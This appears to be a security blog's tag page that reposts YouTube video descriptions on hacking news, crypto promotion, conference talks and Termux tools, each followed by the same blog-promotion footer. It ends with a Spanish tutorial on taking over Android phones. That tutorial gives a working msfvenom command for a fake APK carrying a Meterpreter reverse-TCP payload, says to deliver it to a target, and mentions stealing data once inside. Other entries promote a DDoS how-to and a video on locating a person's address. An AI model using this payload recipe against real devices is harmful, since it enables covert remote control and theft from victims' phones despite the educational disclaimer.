Showing posts with label tablet. Show all posts
Showing posts with label tablet. Show all posts

TODO sobre PWNKIT la Nueva VULNERABILIDAD en LINUX (CVE-2021-4034) - Escalar privilegios a ROOT🥵



ENTRA AQUÍ ☝️ Para APRENDER todo sobre la vulnerabilidad PWNKIT (CVE-2021-4034) 🔴👇 Vídeos Relacionados😊: ⚡ Video Andorra👉https://youtu.be/wwj4yGeJnkY 🔥 Vídeo Lo4j 👉 https://youtu.be/55KQP90fc6o ✅ Vídeo de los permisos 👉 https://youtu.be/M6dnlTKkFO8 👨‍💻 Curso de REDES desde 0 AQUÍ 👉 https://www.youtube.com/playlist?list=PLG1hKOHdoXkvFy_6g4_zf7mgq4kEu8V9H 👨‍💻 Curso de HACKING desde 0 AQUÍ 👉 https://www.youtube.com/playlist?list=PLG1hKOHdoXkvhIO_x62ivA3iLh-m9L_3V 👨‍💻 Curso de LINUX desde 0 AQUÍ 👉 https://www.youtube.com/playlist?list=PLG1hKOHdoXktPkbN_sxqr1fLqDle8wnOh ----------------------------------------------------------------------------------------------------------------------------------------------------------- 📲 Mi día a día en 👉 https://ift.tt/CxUkY3Q84 👉 https://twitter.com/ContandoBits_ 😍 Quieres seguir Aprendiendo? 👉 https://www.youtube.com/c/ContandoBits?sub_confirmation=1 🔴 No te pierdas mis Directos de Twitch 👉 https://ift.tt/WnUFwHM1a 💻 Forma parte de nuesta comunidad en Discord 👉https://ift.tt/VcUlfkdvz --------------------------------------------------------------------------------------------------------------------------------------------------------- En este vídeo hablaremos de la nueva vulnerabilidad CRÍTICA de Linux. Esta vulnerabilidad es la CVE-2021-4034, o también conocida como PwnKit, debido a que afecta a la funcionalidad de linux PolKit, que se encarga de gestionar permisos entre procesos. Concretamente afecta al binario pkexec, el cual a través de una herramienta de github podremos conseguir el privilegio del usuario root (administrador de linux) dando igual el usuario que seamos. Además de esto, también veremos como podemos mitigarlo nosotros manualmente sin tener que esperar al parche. --------------------------------------------------------------------------------------------------------------------------------- ✅Mis Recomendaciones 👇 | --------------------------------------------------------------------------------------------------------------------------------- 🏭 Mira mi sección en Amazon! 👉https://ift.tt/5C3gcvMOe 🌐 Échale un ojo a la web! 👀👉 https://ift.tt/xfAz2s5kw 💻 PCComponentes 👉 https://tidd.ly/3Cc5DRZ 🌍 Crea Tu web (hosting+dominio) 👉 https://ift.tt/HJMOFLfXg --------------------------------------------------------------------------------------------------------- 🌐 Sígueme en mis REDES 👇 | --------------------------------------------------------------------------------------------------------- 📲 Instagram 👉 https://ift.tt/CxUkY3Q84 | 🐦 Twitter 👉 https://twitter.com/ContandoBits_ 🔴 Twitch 👉 https://ift.tt/WnUFwHM1a | 💻 Discord 👉 https://ift.tt/VcUlfkdvz | ---------------------------------------------------------------------------------------------------------------------------------------------- 👨‍🎓 Quieres APRENDER Más? 👇 | ---------------------------------------------------------------------------------------------------------------------------------------------- 🔐 Curso completo de CRIPTOGRAFÍA AQUÍ 👉 https://www.youtube.com/playlist?list=PLG1hKOHdoXkt1V51gyPMZqgQ8LjK3LfmJ 🐧 Aprende LINUX desde 0 👉 https://www.youtube.com/playlist?list=PLG1hKOHdoXktPkbN_sxqr1fLqDle8wnOh 👨‍💻 Aprende a Hackear desde 0 👉https://www.youtube.com/playlist?list=PLG1hKOHdoXktIX6AYe-rKCglJQSJCqDxi 💀 HACKEOS 👉 https://www.youtube.com/playlist?list=PLG1hKOHdoXktqAMkO3CQT_dd6EFEhNaNH 📕 Mi paso por la UNIVERSIDAD 👉 https://www.youtube.com/playlist?list=PLG1hKOHdoXkt1hujzhxVbYRY2u_gbHwob 🐍 Proyectos en Python 👉 https://www.youtube.com/playlist?list=PLG1hKOHdoXku9Bg-cm2zIfmJnBgFG84cJ 😲 Tu PRIVACIDAD en INTERNET 👉 https://www.youtube.com/playlist?list=PLG1hKOHdoXkuqc70jH_p7Ss8MkZeOihyP 😎 Charlas y entrevisatas de Ciberseguridad 👉https://www.youtube.com/playlist?list=PLG1hKOHdoXksP5OqJZMEyd7BFJdO0u-Vb --------------------------------------------------------------------------------------------------------- ⌚ Minutos 👇 | --------------------------------------------------------------------------------------------------------- 00:00 De que trata la vulnerabilidad 01:23 Escalada de privilegios 01:50 Ver si tenemos pkexec 02:47 Sintaxis y ejecucción de pkexec 03:50 A qué Linux afecta 05:00 Qué son los permisos SUID 06:37 Buscar archivos con SUID activado 08:04 Explotación de la vulnerabilidad pwnkit 10:20 Mitigación de PwnKit

source: https://www.youtube.com/watch?v=GjYg70HV5WQ



Para mas informacion visita: https://sectemple.blogspot.com/


Visita mis otros blogs
https://elantroposofista.blogspot.com/
https://gamingspeedrun.blogspot.com/
https://skatemutante.blogspot.com/
https://budoyartesmarciales.blogspot.com/
https://elrinconparanormal.blogspot.com/
https://freaktvseries.blogspot.com/


BUY cheap unique NFTs: https://mintable.app/u/cha0smagick

Hacking Trains to Stop a Russian Invasion



Altium 👉 https://ift.tt/ImcLkwfbj 0:00 Hacking Trains 3:10 Whole Country Shut Down By Minecraft DDoS 4:55 Segway Hacked With a Favicon 6:46 Altium Designer 7:12 Outro Sources: https://ift.tt/gltoQaHf7 https://ift.tt/BRFSHqjDX https://ift.tt/3mGjn9ZcL https://ift.tt/lLheUxrvM https://ift.tt/lwnt6br19 https://ift.tt/QNktC5msj https://ift.tt/x27sakdNK https://twitter.com/cpartisans/status/1485615555017117700 https://ift.tt/W7yAj023n https://ift.tt/reLZMj6Vg https://ift.tt/QKlkRTpoa https://ift.tt/x27sakdNK https://ift.tt/ZSlELsmM8 https://www.youtube.com/watch?v=zqEXM8-YHqw https://ift.tt/WVqCuTF0y https://ift.tt/Ms1v2Vkij https://ift.tt/SFCfYXo5e https://ift.tt/Us9JHlkBN https://ift.tt/dVa736rQR https://ift.tt/QcobUZjgG https://ift.tt/7EukwXLxi https://ift.tt/gsJtNWojx https://ift.tt/e47gW3QjF https://ift.tt/toqUBKbV5 https://ift.tt/JfDdibhkG https://ift.tt/OnaT8N4x2 https://ift.tt/XgHTcj2Jk https://ift.tt/hisOd7uvM https://ift.tt/iuqbz5y1l https://ift.tt/KEjd8czH5 https://ift.tt/EKftuG3oF https://ift.tt/R4CD2TNav =============================================== My Website: https://ift.tt/DPhHKdnML Follow me on TWTR: https://twitter.com/seytonic Follow me on INSTA: https://ift.tt/bv5cJCUNp ===============================================

source: https://www.youtube.com/watch?v=VHjoflBCgPc



Para mas informacion visita: https://sectemple.blogspot.com/


Visita mis otros blogs
https://elantroposofista.blogspot.com/
https://gamingspeedrun.blogspot.com/
https://skatemutante.blogspot.com/
https://budoyartesmarciales.blogspot.com/
https://elrinconparanormal.blogspot.com/
https://freaktvseries.blogspot.com/


BUY cheap unique NFTs: https://mintable.app/u/cha0smagick

ALERTA! EEUU PROHIBIRÁ EXCHANGES DE CRIPTOMONEDAS??? DICTADURA CRIPTO?? (ESTO ES GRAVE!!!)



💎Conseguí $50 en Crypto.com Exchange con este link: https://ift.tt/InRN7kB6v 💎 Y ganá $25 más en la app de Crypto.com con este otro: https://ift.tt/EyWIOr3Kd 👉 25% OFF en las comisiones de PrimeXBT (código LAOLA50): https://ift.tt/vUlIOQdn9 👉 App de PrimeXBT: https://ift.tt/0qDFktAw8... 👉 Tutorial de COPY TRADING: https://youtu.be/ANF7IRMj5no?t=454 🧠 73% de descuento + 4 meses gratis en NordVPN: https://ift.tt/2vO9fa5Up Código: laolacripto 💥 Compra cripto en OKEX con un 20% de descuento en todas las comisiones de trading + un bono de $80: https://ift.tt/clJK61whp ► ¡Hace staking de Cardano con nosotros! Unite a CAPO pool: 👉 Página de CardaPool (CAPO): https://ift.tt/ENRhM5uW9 👉 CAPO en adapools: https://ift.tt/91UC6iLlR 👉 CAPO en Telegram: https://ift.tt/LbvOKIkeR ► Si te gusta el video, dale like, suscribite y activa las notificaciones. A ver a cuántos seguidores llegamos! 👉 Grupo de telegram de La Ola Cripto: https://ift.tt/Am0pNMLcH 👉 Twitter: https://twitter.com/LaOlaCripto_ok 👉 Grupo de análisis técnico CryptoGo: https://t.me/CryptoGoEN ––––––––––––––––––––––––––––––––––––––––––––––––––– Marcas temporales: 00:00 Intro 01:07 El proyecto de EEUU 03:48 Amenaza a la democracia y exchanges 06:18 Análisis en los gráficos ––––––––––––––––––––––––––––––––––––––––––––––––––– Descargo de responsabilidad: Este video no constituye forma alguna de asesoría financiera. Tiene como único objetivo el entretenimiento. Para obtener asesoría financiera o de inversiones, busca un profesional licenciado. Este video contiene mi opinión y no está dirigido a causar daño alguno sobre cualquier persona o entidad. Por favor, entienda que el comercio de criptomonedas o cualquier otro tipo de inversión es riesgoso. No ofrezco consejos sobre cómo tú debes invertir o comerciar criptomonedas. Este canal está dedicado exclusivamente a dar mi opinión personal y no a aconsejar ni a influenciar a ninguna persona o usuario. ––––––––––––––––––––––––––––––––––––––––––––––––––– #LaOlaCripto #bitcoin #BitcoinUSA #JanetYellen #USBitcoin #InfrastructureBill #cardano #ethereum #bitcoin #cardanoada #btc #ada #cardanoadanews #cardanoprecio #eth #ethereumnews #ethereumprecio #analisistecnico #analisis #crypto #cryptocurrency #blockchain #finance #stock #investment #altcoins #invertir #cripto #criptomonedas #finanzas #economía #dólares #ahorros #noticias #fomo #acciones #urgente #alltimehigh #visa #mastercard #paypal #elonmusk #nordvpn #tradingmasterysummit #eeuu #estadosunidos #unitedstates #usa #okex #binance #primexbt

source: https://www.youtube.com/watch?v=cduyDM_3nJA



Para mas informacion visita: https://sectemple.blogspot.com/


Visita mis otros blogs
https://elantroposofista.blogspot.com/
https://gamingspeedrun.blogspot.com/
https://skatemutante.blogspot.com/
https://budoyartesmarciales.blogspot.com/
https://elrinconparanormal.blogspot.com/
https://freaktvseries.blogspot.com/


BUY cheap unique NFTs: https://mintable.app/u/cha0smagick

How To Find Your Friend Address with Name | In Hindi | Information Gathering



Hey there, welcome to our Channel White Devil so guys today we gonna learn how you can find your friends address or anyone's address without any hustle. and this is the most easiest way to do this so please watch the video till the end and you will get my point I Hope you enjoy/enjoyed the video. If you have any questions or suggestions feel free to ask them in the comments section. Termux Playlist:- Ethical Hacking Playlist:- thankyou for the possitive comments into the comment box and please access our playlist which is help to you so much so please access it ---------------------------------------------------------------------------------------------------------------------------- If you do not have laptop so do not worry we have the termux playlist which is fully working on the mobile so do not worry about the laptop just focus on what you have instead of laptop _______________________________________ you can also join and support us on our mentioned below Account Instagram Account:-@whitedevil9301 facebook page:- White Devil __________________________________________ Thank you😀|support |share|subscribe #WHITE DEVIL MUSIC CREDIT-JERICO LANDSCAPE DISCLAIMER video is for educational purpos only. Copyright Disclaimer Under Section 107 of the Copyright Act 1976,allowance is made for "fair use" for purposes such as criticism,comment,new reporting,teaching,scholarship,and research.Fair use is a use permitted by copyright statute that might otherwise be infringing. Non-profit,educational or personal use tips the balance in favour of fair use Thanks for Watching Plz Like and Comments.. PLZ SUBSCRIBE TO OUR CHANNEL

source: https://www.youtube.com/watch?v=2p2nCKP0StU



Para mas informacion visita: https://sectemple.blogspot.com/


Visita mis otros blogs
https://elantroposofista.blogspot.com/
https://gamingspeedrun.blogspot.com/
https://skatemutante.blogspot.com/
https://budoyartesmarciales.blogspot.com/
https://elrinconparanormal.blogspot.com/
https://freaktvseries.blogspot.com/


BUY cheap unique NFTs: https://mintable.app/u/cha0smagick

#pwnx Welcome to PWNX



Bella a tutti ragazzi. Oggi in questo video vi porto una piccola review di una nuova platform. Challenges di ogni tipo, web, pwn, misc, laboratori RED, BLUE e PURPLE. Piattaforma very user friendly. PROVATELA!!!! ------------------------------ Visitate il loro sito: https://pwnx.io LinkedIn : https://ift.tt/qtRXChcZb Twitter: https://twitter.com/pwnx_official ---------------------------------------------------------- Per tutti gli altri video e gli articoli visita il nostro sito: https://www.pentestingmadesimple.it​​ ---------------------------------------------------------- Entra a far parte della nostra community su: - Discord: https://discord.gg/CMYXX2E​​ - Telegram: https://t.me/pentestingmadesimple​​ Unisciti a noi dal vivo su Twitch: https://ift.tt/VTdUPnlY5 ------------------------------------------------------------ #CyberSecurity #EthicalHacking #SicurezzaInformatica #Pentesting #BugBounty #WebSec #Exploit #WebApp #CTF #Methodology

source: https://www.youtube.com/watch?v=DA0MrtNZD5I



Para mas informacion visita: https://sectemple.blogspot.com/


Visita mis otros blogs
https://elantroposofista.blogspot.com/
https://gamingspeedrun.blogspot.com/
https://skatemutante.blogspot.com/
https://budoyartesmarciales.blogspot.com/
https://elrinconparanormal.blogspot.com/
https://freaktvseries.blogspot.com/


BUY cheap unique NFTs: https://mintable.app/u/cha0smagick

Marina contuvo 28.8 millones de ciberataques en siete años



Noticias de #ciberseguridad #Podcast - 117 Con información del SOL de MEXICO El 16 de enero de 2013 el colectivo Anonymous amenazó con revelar información sustraída de la Secretaría de Marina (Semar) luego de que la página fuera hackeada. Ese mismo día la dependencia señaló que el sitio de internet sólo presentó un ataque de "denegación de servicio", sin que significara daños a las Operaciones Navales o a la Seguridad Nacional. Dos años más tarde, durante el 2015, la dependencia militar registró 7.6 millones de intentos de ciberataques. Estos fueron los primeros de 28.8 millones registrados hasta mediados de 2021, según datos obtenidos por transparencia. Sin embargo, aclara el documento, todos fueron contenidos por la Unidad de Ciberseguridad de la Semar. Visitanos en : https://hackeado.com.mx

source: https://www.youtube.com/watch?v=MajuG9rO7D8



Para mas informacion visita: https://sectemple.blogspot.com/


Visita mis otros blogs
https://elantroposofista.blogspot.com/
https://gamingspeedrun.blogspot.com/
https://skatemutante.blogspot.com/
https://budoyartesmarciales.blogspot.com/
https://elrinconparanormal.blogspot.com/
https://freaktvseries.blogspot.com/


BUY cheap unique NFTs: https://mintable.app/u/cha0smagick

Así de fácil pueden robar información de tu dispositivo // Como evitarlo?



** AVISO LEGAL Y DESCARGO DE RESPONSABILIDAD ** Toda la información en este video es para fines didácticos y de aprendizaje. Estas técnicas no deben ser utilizadas en sistemas ajenos, únicamente sobre sistemas donde se cuenta con el permiso de su dueño, o bien, sistemas propios. Ejecutar estas acciones sin previo permiso o consentimiento puede llevar a consecuencias legales. ==================================================================== ¡YA SOMOS HUMBLE PARTNERS! Recuerda que puedes adquirir cualquiera de tus productos de Humble Bundle y adicionar nuestro partner id "?partner=ergohackers" para mostrar tu apoyo hacia nosotros y hacia las caridades que hemos seleccionado. ¡Suscríbete hoy! https://ift.tt/lHTMWdaK2 Si quieres mostrarnos tu apoyo con algo adicional, puedes invitarnos a un cafecito en https://ift.tt/krIUH4OM1 Recuerden visitar los cursos gratis disponibles en nuestro canal: * Introducción a la Seguridad Informática: https://www.youtube.com/playlist?list=PLNmV1qHP7UdlAYYiksoYJdVp4YnEkH3sL * Introducción al Framework de Metasploit - https://www.youtube.com/playlist?v=faybTAmM6TU&list=PLNmV1qHP7UdnQFejtQKDpYnOh74z9hE3r De igual manera, pueden visitar los cursos más profundos que tenemos disponibles en Udemy: * CISSP Edición premium: ¡Todos los dominios! - https://ift.tt/CrA9p5UE2 * Hacking Ético y Pentest Avanzado - https://ift.tt/rpKkNgyEF Por último, no olviden pasar a formar parte de nuestra comunidad en Facebook: * https://ift.tt/XdQeOz4Br

source: https://www.youtube.com/watch?v=vRNahtE5e-8



Para mas informacion visita: https://sectemple.blogspot.com/


Visita mis otros blogs
https://elantroposofista.blogspot.com/
https://gamingspeedrun.blogspot.com/
https://skatemutante.blogspot.com/
https://budoyartesmarciales.blogspot.com/
https://elrinconparanormal.blogspot.com/
https://freaktvseries.blogspot.com/


BUY cheap unique NFTs: https://mintable.app/u/cha0smagick

Investigación: uTorrent El rey de las descargas | ¿Steam Verde?



Este vídeo recolecta información libre de internet y la presenta de manera ordenada. 📌Investigación: Ares Galaxy: https://youtu.be/ekl1bwsUgEk 📀Ambientación musical/Beats: http://bit.ly/TOMMYBT Nuestras redes sociales 🔴FACEBOOK: https://goo.gl/z6S1rB 🔴TWITTER: https://goo.gl/ZxVpFF 🔴INSTAGRAM: https://goo.gl/6dXNJ4 📨Negocios/contacto: dokken0@bk.ru #uTorrent #InvestigaciónuTorrent #Steamverde

source: https://www.youtube.com/watch?v=ZRywjgb5xWw



Para mas informacion visita: https://sectemple.blogspot.com/


Visita mis otros blogs
https://elantroposofista.blogspot.com/
https://gamingspeedrun.blogspot.com/
https://skatemutante.blogspot.com/
https://budoyartesmarciales.blogspot.com/
https://elrinconparanormal.blogspot.com/
https://freaktvseries.blogspot.com/


BUY cheap unique NFTs: https://mintable.app/u/cha0smagick

Investigación: Softonic Abundancia de M4lwar3 | ¿Realmente infecta tu PC?



Este vídeo recolecta información libre de internet y la presenta de manera ordenada. 📌ENLACE AL SORTEO: https://ift.tt/HCNxeVF5M Nuestras redes sociales 🔴FACEBOOK: https://goo.gl/z6S1rB 🔴TWITTER: https://goo.gl/ZxVpFF 🔴INSTAGRAM: https://goo.gl/6dXNJ4 📨Negocios/contacto: dokken0@bk.ru #Softonic #InvestigaciónSoftonic SoftonicVirus

source: https://www.youtube.com/watch?v=qZ0us1g21dY



Para mas informacion visita: https://sectemple.blogspot.com/


Visita mis otros blogs
https://elantroposofista.blogspot.com/
https://gamingspeedrun.blogspot.com/
https://skatemutante.blogspot.com/
https://budoyartesmarciales.blogspot.com/
https://elrinconparanormal.blogspot.com/
https://freaktvseries.blogspot.com/


BUY cheap unique NFTs: https://mintable.app/u/cha0smagick

Uncovering and Visualizing Malicious Infrastructure - SANS Threat Hunting Summit 2018



How much information about a threat can you find using a single IP address, domain name, or indicator of compromise (IOC)? What additional threats can you identify when looking at attacker and victim infrastructure? To discover and analyze the infrastructure behind large-scale malware activity, we’ll look at known indicators from popular botnets spreading such threats as Locky, Globeimposter, and Trickbot. We will highlight co-occurring malicious activities observed on the infrastructure of popular botnets, and demonstrate practical techniques to find threats, analyze botnet and malware infrastructure in order to identify actor and victim infrastructure, and show how to pivot to discover additional IOCs using such techniques as passive DNS and OSINT. Finally, we will demonstrate how visualizing known IOCs helps to better understand the connections between infrastructure, threats, victims, and malicious actors. Josh Pyorre (@joshpyorre), Security Research Analyst, Cisco Umbrella Josh has worked in security for 14 years. He’s been a threat analyst at NASA and also helped to build the Security Operations Center at Mandiant. His professional interests involve network, computer, and data security. Andrea Scarfo (@AScarf0), Security Research Analyst, Cisco Umbrella Andrea worked as a Sysadmin for 12 years and has worked with Hewlett Packard and the city of Danville, CA. She began working with Open DNS in 2015 and has worked tirelessly to make the Internet a safer place.

source: https://www.youtube.com/watch?v=FrAY6B-L_o8



Para mas informacion visita: https://sectemple.blogspot.com/


Visita mis otros blogs
https://elantroposofista.blogspot.com/
https://gamingspeedrun.blogspot.com/
https://skatemutante.blogspot.com/
https://budoyartesmarciales.blogspot.com/
https://elrinconparanormal.blogspot.com/
https://freaktvseries.blogspot.com/


BUY cheap unique NFTs: https://mintable.app/u/cha0smagick

Hunting Webshells: Tracking TwoFace - SANS Threat Hunting Summit 2018



Microsoft Exchange Servers are a high-value target for many adversaries, which makes the investigation of them during Incident Response vital. Backdoor implants in the form of webshells and IIS modules on servers are on the rise. Find out how to hunt webshells and differentiate between legitimate use and attacker activity, using default logging available on every exchange server. The presentation will feature real-world examples carried out by an adversary group using web-based backdoors to breach and maintain access to networks of targeted organizations in the Middle East. Josh Bryant (@FixtheExchange), Director of Technical Account Management, Tanium Josh Bryant is currently a Director of Technical Account Management at Tanium where he helps customers conduct rapid Threat Hunting data collection on a very large scale. Prior to joining Tanium, he was a Cybersecurity Architect at Microsoft where he focused on delivering Cybersecurity services ranging from Tactical and Strategic Recovery to Advanced Threat Analytics implementations, Risk Assessments, and more, to customers in a variety of industries around the world. Josh is also a Master Sergeant in the Illinois Air National Guard, where he manages a team of Systems Administrators that maintain an Air Operations Center. He has over 19 years in IT specializing in Cybersecurity and Messaging, and spent some of his Active Duty U.S. Air Force time as a Network Security Manager, performing vulnerability assessments and penetration testing. Robert Falcone, Threat Researcher, Palo Alto Unit 42 Robert is a Threat Intelligence Analyst with Palo Alto Networks’ Unit42 focusing on malware analysis, reverse engineering, and tracking advanced threat actors. Prior to joining Unit42, he was a Malware Research Engineer at iDefense focusing primarily on malware analysis and tracking threat actors associated with cyber espionage activity. He also worked as a Security Engineer within a Security Operations Center for a managed security service provider focused on intrusion detection and prevention.

source: https://www.youtube.com/watch?v=GjquFKa4afU



Para mas informacion visita: https://sectemple.blogspot.com/


Visita mis otros blogs
https://elantroposofista.blogspot.com/
https://gamingspeedrun.blogspot.com/
https://skatemutante.blogspot.com/
https://budoyartesmarciales.blogspot.com/
https://elrinconparanormal.blogspot.com/
https://freaktvseries.blogspot.com/


BUY cheap unique NFTs: https://mintable.app/u/cha0smagick

Microsoft libra ataque DDoS más grande en la historia de internet - Conoce que es un ataque DDoS



Noticias de #ciberseguridad #Podcast - 116 La compañía de Bill Gates sobrevivió y venció a finales de 2021 a un ataque DDoS donde se juntó un tráfico de 3,47 terabytes por segundo. Un número jamás registrado en la historia de los ataques de este tipo. ¿Y que es un ataque DDoS? Es un ataque diseñado para tirar un servidor o una página web. El objetivo del delincuente es obtener dinero a cambio de parar el ataque y que la pagina web funcione con normalidad. Visitanos en : https://hackeado.com.mx

source: https://www.youtube.com/watch?v=CLxl1_LGqjw



Para mas informacion visita: https://sectemple.blogspot.com/


Visita mis otros blogs
https://elantroposofista.blogspot.com/
https://gamingspeedrun.blogspot.com/
https://skatemutante.blogspot.com/
https://budoyartesmarciales.blogspot.com/
https://elrinconparanormal.blogspot.com/
https://freaktvseries.blogspot.com/


BUY cheap unique NFTs: https://mintable.app/u/cha0smagick

MINÁ CRIPTOMONEDAS EN TU CELULAR Y GANA!!! 🤑 — NODLE CASH: Nueva PARACHAIN en POLKADOT



► Nodle Crowdloan con +5% Rewards adicionales: https://ift.tt/v6HmgwoSp ► Sitio web: https://bit.ly/nodle1 ► Telegram español: https://bit.ly/nodleespanol ► Nodle Twitter: https://bit.ly/nodletweets 💎Conseguí $50 en Crypto.com Exchange con este link: https://ift.tt/InRN7kB6v 💎 Y ganá $25 más en la app de Crypto.com con este otro: https://ift.tt/EyWIOr3Kd 🧠 73% de descuento + 4 meses gratis en NordVPN: https://ift.tt/2vO9fa5Up Código: laolacripto 💥 Compra cripto en OKEX con un 20% de descuento en todas las comisiones de trading + un bono de $80: https://ift.tt/clJK61whp ► ¡Hace staking de Cardano con nosotros! Unite a CAPO pool: 👉 Página de CardaPool (CAPO): https://ift.tt/ENRhM5uW9 👉 CAPO en adapools: https://ift.tt/91UC6iLlR 👉 CAPO en Telegram: https://ift.tt/LbvOKIkeR ► Si te gusta el video, dale like, suscribite y activa las notificaciones. A ver a cuántos seguidores llegamos! 👉 Grupo de telegram de La Ola Cripto: https://ift.tt/Am0pNMLcH 👉 Twitter: https://twitter.com/LaOlaCripto_ok 👉 Grupo de análisis técnico CryptoGo: https://t.me/CryptoGoEN ––––––––––––––––––––––––––––––––––––––––––––––––––– Marcas temporales: 00:00 Intro 01:07 Qué es Nodle? 03:02 Cómo ganar $$$ con la app 04:11 El token de NODL 04:58 Parachain en Polkadot? 06:55 Cómo participar en el parachain ––––––––––––––––––––––––––––––––––––––––––––––––––– Descargo de responsabilidad: Este video no constituye forma alguna de asesoría financiera. Tiene como único objetivo el entretenimiento. Para obtener asesoría financiera o de inversiones, busca un profesional licenciado. Este video contiene mi opinión y no está dirigido a causar daño alguno sobre cualquier persona o entidad. Por favor, entienda que el comercio de criptomonedas o cualquier otro tipo de inversión es riesgoso. No ofrezco consejos sobre cómo tú debes invertir o comerciar criptomonedas. Este canal está dedicado exclusivamente a dar mi opinión personal y no a aconsejar ni a influenciar a ninguna persona o usuario. ––––––––––––––––––––––––––––––––––––––––––––––––––– #LaOlaCripto #Polkadot #Nodle #NodleParachain #cardano #ethereum #bitcoin #cardanoada #btc #ada #cardanoadanews #cardanoprecio #eth #ethereumnews #ethereumprecio #analisistecnico #analisis #crypto #cryptocurrency #blockchain #finance #stock #investment #altcoins #invertir #cripto #criptomonedas #finanzas #economía #dólares #ahorros #noticias #fomo #acciones #urgente #alltimehigh #visa #mastercard #paypal #elonmusk #nordvpn #tradingmasterysummit #eeuu #estadosunidos #unitedstates #usa #okex #binance #primexbt

source: https://www.youtube.com/watch?v=VOHNoRMhkyA



Para mas informacion visita: https://sectemple.blogspot.com/


Visita mis otros blogs
https://elantroposofista.blogspot.com/
https://gamingspeedrun.blogspot.com/
https://skatemutante.blogspot.com/
https://budoyartesmarciales.blogspot.com/
https://elrinconparanormal.blogspot.com/
https://freaktvseries.blogspot.com/


BUY cheap unique NFTs: https://mintable.app/u/cha0smagick

Como instalar Ngrok en Termux 2022 parte 2



Este video fue realizado con fines educativos e informativos, no me hago responsable del mal uso que se le pueda dar. lista de reproducción [Ngrok - Termux] https://www.youtube.com/playlist?list=PLVoC0iBrTPQ2S2Ie3seNNOBDDhUAnqbk1 Códigos en la caja de comentarios.

source: https://www.youtube.com/watch?v=u7dGrJulhUM



Para mas informacion visita: https://sectemple.blogspot.com/


Visita mis otros blogs
https://elantroposofista.blogspot.com/
https://gamingspeedrun.blogspot.com/
https://skatemutante.blogspot.com/
https://budoyartesmarciales.blogspot.com/
https://elrinconparanormal.blogspot.com/
https://freaktvseries.blogspot.com/


BUY cheap unique NFTs: https://mintable.app/u/cha0smagick

Como se hace un Dd0s - Fines Informativos



Los comandos estarán en el comentario fijado Canal de la persona que aporto al video,dejenle mucho apoyo subira pronto videos :D : https://youtube.com/channel/UCTVef3IzBWf-Hoxy6qdHFnA Sigueme en instagram xd : https://ift.tt/ThBjK7b3q Mi server: https://ift.tt/7U4cS9wtf Server de clases de Euronymous 5: https://ift.tt/wnpO0SADm Grupo de wsp : https://ift.tt/i1mvynlj4

source: https://www.youtube.com/watch?v=z-7gkKPqkrA



Para mas informacion visita: https://sectemple.blogspot.com/


Visita mis otros blogs
https://elantroposofista.blogspot.com/
https://gamingspeedrun.blogspot.com/
https://skatemutante.blogspot.com/
https://budoyartesmarciales.blogspot.com/
https://elrinconparanormal.blogspot.com/
https://freaktvseries.blogspot.com/


BUY cheap unique NFTs: https://mintable.app/u/cha0smagick

Como instalar Ngrok en Termux 2022



Este video fue realizado con fines educativos e informativos, no me hago responsable del mal uso que se le pueda dar. lista de reproducción [Ngrok - Termux] https://www.youtube.com/playlist?list=PLVoC0iBrTPQ2S2Ie3seNNOBDDhUAnqbk1

source: https://www.youtube.com/watch?v=3WKuoR55gvc



Para mas informacion visita: https://sectemple.blogspot.com/


Visita mis otros blogs
https://elantroposofista.blogspot.com/
https://gamingspeedrun.blogspot.com/
https://skatemutante.blogspot.com/
https://budoyartesmarciales.blogspot.com/
https://elrinconparanormal.blogspot.com/
https://freaktvseries.blogspot.com/


BUY cheap unique NFTs: https://mintable.app/u/cha0smagick

TUTORIAL LEGAL - Como hackear cualquier celular, tablet o dispositivo Android con Armitage y Msfvenom ( metodo del .apk Falso)

Buy cheap awesome NFTs: https://mintable.app/u/cha0smagick

¡Bienvenidos a nuestro tutorial de hacking legal en español! En este artículo, les enseñaremos cómo hackear cualquier celular, tablet o dispositivo Android utilizando las herramientas de Armitage y Msfvenom con el método del .apk Falso.

Antes de comenzar, queremos aclarar que este tutorial es para fines educativos y legales solamente. No nos hacemos responsables del mal uso de esta información. Además, es importante tener en cuenta que el hacking ético es una habilidad valiosa que puede ser utilizada para mejorar la seguridad en línea y proteger a las personas y empresas de los ataques malintencionados.

Con eso dicho, ¡vamos a empezar!

Paso 1: Configuración de Armitage

Lo primero que necesitamos es configurar Armitage, una herramienta de hacking que nos permitirá escanear y atacar dispositivos Android. Para ello, necesitamos instalar Kali Linux en nuestro sistema operativo.

Una vez que hayamos instalado Kali Linux, abrimos Armitage y seleccionamos "Agregar host" para agregar el dispositivo que queremos atacar. Ingresamos la dirección IP del dispositivo y presionamos "Agregar host".

Paso 2: Creación de .apk Falso

El siguiente paso es crear un archivo .apk Falso que pueda ser descargado e instalado en el dispositivo objetivo. Para ello, utilizaremos Msfvenom, una herramienta de creación de exploits.

En la terminal de Kali Linux, ingresamos el siguiente comando:

msfvenom -p android/meterpreter/reverse_tcp LHOST=<tu dirección IP> LPORT=<puerto> -o <nombre del archivo>.apk

Este comando creará un archivo .apk Falso con el nombre que hayas especificado. Este archivo será nuestro exploit que utilizaremos para hackear el dispositivo objetivo.

Paso 3: Ataque

Una vez que hayamos creado el archivo .apk Falso, lo cargamos en Armitage y lo enviamos al dispositivo objetivo. Si el dispositivo es vulnerable, el exploit se ejecutará y nos dará acceso al sistema.

En este punto, podemos explorar el sistema y hacer lo que queramos, desde acceder a los archivos y la información almacenada en el dispositivo, hasta instalar software malicioso y robar datos sensibles.

Conclusión

¡Felicidades! Ahora sabes cómo hackear cualquier dispositivo Android utilizando Armitage y Msfvenom con el método del .apk Falso. Recuerda que esto es sólo para fines educativos y legales. Es importante utilizar estas herramientas de manera ética y responsable.

Esperamos que este tutorial haya sido útil para ti. Si tienes alguna pregunta o comentario, no dudes en dejarlo en la sección de comentarios a continuación. ¡Nos encantaría saber de ti y crear una comunidad de hackers éticos en español!

Disclaimer: 
Toda actividad de hacking o pentesting, bug bounty o seguridad informática que se realiza en el blog, es realizado en un entorno controlado elaborado por el admin del blog, con permisos para cada acción realizada y sobre cada equipo utilizado, ya que se han adquirido de forma legal para este propósito. En ningún momento se instiga o incentiva a las personas que ven este tutorial a realizar hackeos a equipos sobre los cuales no poseen permisos de manejo o modificación, ya que esto puede conllevar a acciones penales e inclusive, a acciones judiciales en contra del hacker que realice estas acciones. 

Este tutorial es realizado como practica con el único propósito de mostrar a las personas como es que los hackers realizan estas acciones, pero con el fin de que las potenciales víctimas no caigan en este tipo de engaños y o acciones ilegales y que puedan enfrentarse a ellos para evitar perder sus cuentas de redes sociales y| o información personal.



